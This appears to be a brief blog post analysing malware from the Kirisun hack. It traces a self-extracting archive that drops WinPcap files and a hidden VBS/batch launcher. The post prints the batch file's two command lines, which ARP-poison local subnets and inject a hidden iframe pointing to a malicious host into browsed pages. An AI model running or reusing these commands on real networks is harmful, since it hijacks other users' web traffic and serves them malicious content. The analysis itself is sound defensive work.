… by the bad guys unfortunately 
When investigating one of the files that was being downloaded by the initial dropper from the Kirisun hack I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was the “24.exe” and the reason for choosing that one were:
- Easy
Self-extracting RAR, no encryption and no sandbox detection. - It was one of the largest files == lot’s of goodies?
After running the self-extracting RAR in the sandbox I ended up with the following files in c:\windows\system32\:
Inside the “drivers” folder a copy of npf.sys was dropped. This file belongs to the WinPcap project and so does some of the other files that were extracted.
The file that was supposed to auto start after decompression was “3.vbs” whose only job was to silently run “run.bat” which contained the following two lines:
Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert “<iframe src=’hxxp://5.xqhgm.com/2.htm’ width=20 height=1></iframe>”Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert “<iframe src=’hxxp://5.xqhgm.com/2.htm’ width=20 height=1></iframe>”
exit
Ok, then what do our little friend Vml.exe do with these parameters I thought? After asking my friend Google I got the answer that I thought I would get, it was performing ARP poisoning on the local network (well, just the two subnets specified in the .bat) and inserting iframes into all websites being viewed. Previously discovered by CISRT earlier in November.
Genious! One point to the bad guys!
